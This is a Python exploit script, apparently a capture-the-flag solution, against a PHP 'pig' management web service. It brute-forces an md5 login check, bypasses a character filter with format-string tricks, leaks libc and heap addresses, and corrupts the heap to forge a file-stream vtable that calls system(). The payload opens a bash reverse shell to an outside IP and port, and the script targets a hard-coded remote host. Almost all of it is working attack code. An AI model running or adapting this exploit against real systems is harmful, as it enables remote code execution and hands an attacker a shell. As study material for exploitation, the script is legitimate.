#!/usr/bin/python # Author : peternguyen from struct import * from base64 import b64encode,b64decode import requests import re import hashlib import random # host = 'http://localhost:8888' host = 'http://localhost:8887' host = 'http://47.75.153.218:9999' session = requests.Session() # target = 'UOTp%I()<>S' # out = '' # for c in target: # found = False # for func_name in dir("")[::-1]: # try: # doc = getattr(getattr("",func_name),"__doc__") # if c in doc: # idx = doc.find(c) # out += "{0.%s.__doc__[%d]}" % (func_name,idx) # print c,"{0.%s.__doc__[%d]}" % (func_name,idx) # found = True # break # except TypeError: # pass # if not found: # print 'char %s not found' % c # print out,len(out) < 0xc0 def p64(value): return pack('' : '{0.zfill.__doc__[16]}', 'S' : '{0.zfill.__doc__[0]}' } if my_dict.has_key(c): return my_dict[c] return '' def login(): req = session.get(host + '/login.php') out = re.findall(r'md5\(\?\)\[:4\] = ([0-9a-f]{4})',req.text) target_hash = out[0].encode('utf8') print '[!] Target Hash' rand_str = '' while 1: rand_str = str(random.random()*100000000000000) rand_hash = hashlib.md5(rand_str).hexdigest() if rand_hash[:4] == target_hash: print '[!!] Found',rand_str break req = session.post(host + '/login.php',data={'username':'clgt111','vcode':rand_str}) return True def create_pig(idx,data): req = session.post(host + '/addpig.php',data={'id':idx,'content':b64encode(data)}) return req.text def free_pig(idx): req = session.post(host + '/freepig.php',data={'id':idx}) return req.text def secret(): req = session.post(host + '/flypig.php',data={'secret':b64encode(magic)}) return req.text def list_pigs(): req = session.get(host + '/manage.php') return req.text def overflow(value): limit = 'UOTp%I()<>S' v_array = list(value) for i,c in enumerate(v_array): t = bypass(c) if t: v_array[i] = t # print v_array value = b64encode(''.join(v_array)) # print value req = session.post(host + '/flypig.php',data={'secret':value}) return req.text def exploit(**kargs): # global p # use global var # if kargs.has_key('p'): # if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object # p = kargs['p'] # p.connect() # raw_input('Debug>') if not login(): print 'Thot' return create_pig(2,'A'*0xb0) create_pig(1,'B'*0xb0) free_pig(2) create_pig(2,'C'*0xb0) out = list_pigs() out = out.encode('utf8').decode('string-escape') # print repr(out) idx = out.find('Small Li') + len('Small Li') libc = up64(out[idx:idx + 6]) - 0x3c1b58 print 'Libc:',hex(libc) _IO_list_all = libc + 0x3c2500 _IO_wstr_finish = libc + 0x3bdc90 system = libc + 0x456a0 free_pig(2) free_pig(1) create_pig(0,'A'*0xb0) secret() create_pig(2,'A'*0xb0) create_pig(1,'A'*0xb0) free_pig(2) free_pig(0) create_pig(2,'A'*0xb0) out = list_pigs() out = out.encode('utf8').decode('string-escape') idx = out.find('Small Li') + len('Small Li') heap = up64(out[idx:idx + 6]) - 0x19e30 # print repr(out) print '[!] Heap:',hex(heap) fake_chunk = pA(0,0xd1) fake_chunk+= pA(heap + 0x19f80,heap + 0x1a010) fake_chunk+= 'P'*16 fake_chunk+= pA(0,0x61) fake_chunk+= pA(heap + 0x19fe0,libc + 0x3c1b58) free_pig(2) create_pig(2,'A'*0xb0) create_pig(0,'A'*0x40 + fake_chunk) free_pig(0) free_pig(2) overflow(pA(libc + 0x3c1b58,heap + 0x19fe0)) create_pig(0,'Z'*40) create_pig(2,'U'*0x10) free_pig(1) # write IO_wstr_vtable_address write_fake_vtable = 'M'*0x28 + p64(_IO_wstr_finish - 0x18) write_fake_vtable+= 'Z'*8 + p64(system) create_pig(1,'T'*0x48 + p64(0x51) + write_fake_vtable) free_pig(0) free_pig(2) create_pig(0,'A'*0x40+ pA(0,0xd1,0x4141414141, _IO_list_all - 0x10)) # fake_vtable = fake_IO_wstr_vtable = '' fake_io = pA(0,1) fake_io+= 'A'*8 fake_io+= p64(heap + 0x1a020) # command address fake_io+= 'bash -c \'bash -i >& /dev/tcp/139.59.244.42/31337 0>&1\'\x00' # fake_io+= fake_vtable fake_io = fake_io.ljust(176,'A') fake_io+= p64(heap + 0x1a000 - 0x18) fake_io = fake_io.ljust(0xb8,'K') # => control vtable here get shell create_pig(2,fake_io) # raw_input('>') free_pig(1) req = session.post(host + '/freepig.php',data={'id':'1'}) print req.text # print repr(out) # list_pigs() exploit()